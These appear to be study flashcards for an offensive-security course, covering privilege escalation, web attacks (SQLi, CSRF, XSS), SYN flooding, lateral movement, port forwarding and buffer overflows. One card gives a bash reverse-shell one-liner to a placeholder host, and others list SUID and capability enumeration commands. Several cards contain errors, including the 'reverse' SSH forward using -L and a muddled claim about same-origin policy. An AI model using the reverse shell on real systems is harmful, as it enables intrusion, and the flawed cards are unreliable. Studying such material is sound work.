Final Flashcards
What are the 4 main ways to do Privilege Escalation?
- Known Exploits
- Direct Method
- Indirect Method
- Credential Theft
What command shows you what you can run as sudo?
sudo -l
What are setUID programs?
Executables that, when run, will take on the privileges of the owner
What command shows all setUID programs on the system?
find / -perm -4000 2>/dev/null
What are capabilities?
Executables that, when run, have special abilities that the user might not have themselves
What command shows all capabilities on the system?
getcap -r / 2>/dev/null
What is UAC on Windows?
Similar to sudo
How can you view the crontab?
cat /etc/crontab
How can you find public config files?
find /etc -type f -perm -2
How can you find scheduled tasks on windows?
schtasks
How can you find windows services?
sc
What is LOLBAS?
GTFOBins for Windows
Explain how Windows paths can be exploited
Unquoted paths can be exploited if there are spaces in directory names
Whats the difference between /etc/shadow and /etd/passwd
/etc/passwd has users etc/shadow
has password hashes
What is in band SQLi?
uses the same communication channel to execute the attack and retrieve the results
Whats the best way to defend against SQLi?
Prepared statements/sanitize inputs
What is Cross Site Request Forgery (CSRF)?
An attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated
What is Stored CSRF?
When the CSRF payload is stored on the webpage itself
What actions can you perform with a CSRF attack?
POST
GET
PUT
DELETE
What does the Same Origin Policy (SOP) protect against?
CSRF due to a script making an HTTP PUT to another origin
Whats the best way to defend against CSRF?
CSRF Token
What is Cross Site Scripting (XSS)?
A type of injection, in which malicious scripts are injected into otherwise benign and trusted websites
What is the TCP handshake?
SYN, SYN+ACK, ACK
What is SYN Flooding?
An attacker floods the TCP server with half-open TCP connections which then causes the TCP server to not receive any more connections
How can SYN Flooding be prevented?
TCP Retransmission
Size of SYN Queue
TCP Cache
SYN Cookie
What is a general command to get a reverse shell?
/bin/bash -i > /dev/tcp/<ip>/<port> 0<&1 2>&1</port></ip>
How does the Mitnick attack work?
- Disable the trusted server
- Attacker creates and hijacks a TCP session by spoofing the following from the Trusted Server:
1) SYN
2) ACK
3) RSH command - Spoof the return connection from the victim server
How do SYN cookies defend against SYN flooding?
- The attacker does not receive the SYN/ACK from the server and cannot calculate the value of the SYN/ACK’s sequence number
- The server does not keep a SYN queue
When injecting data into an existing TCP session, why do you not have to guess the sequence number exactly?
As long as you get the sequence number within the TCP sliding window, the data will be sent to the application eventually
Lateral Movement
Any “advancement” in the network that is not an “elevation”
What are the different lateral movement techniques?
PsExec
WinRM
WMI
Smbexec
What is a Pass-The-Hash attack?
When you can authenticate with just the hash of a password, instead of the plaintext
What is static port forwarding?
Destinations are fixed
One tunnel for each destination
What is dynamic port forwarding?
Destinations are NOT fixed
One tunnel for many destinations
Uses SOCKS proxy
What does a forward static port forwarding command look like?
ssh -4NT -L [local port]:[end goal ip]:[end goal port] user@[intermediate ip] (run on local machine)
What does a reverse static port forwarding command look like?
ssh -4NT -L 0.0.0.0:[home port]:[end goal ip]:[end goal port] user@[home ip] (run on remote machine)
Explain Metasploit route and autoroute
Route - route to a particular IP address through an existing session
Autoroute - Post module to add new routes found from a session
What is a wormable vulnerability?
A network vulnerability which can allow a worm to self-propagate by automatically gaining RCE on new hosts
When we perform the buffer overflow, what values do we overwrite on the stack?
The return address
The previous frame pointer
The function arguments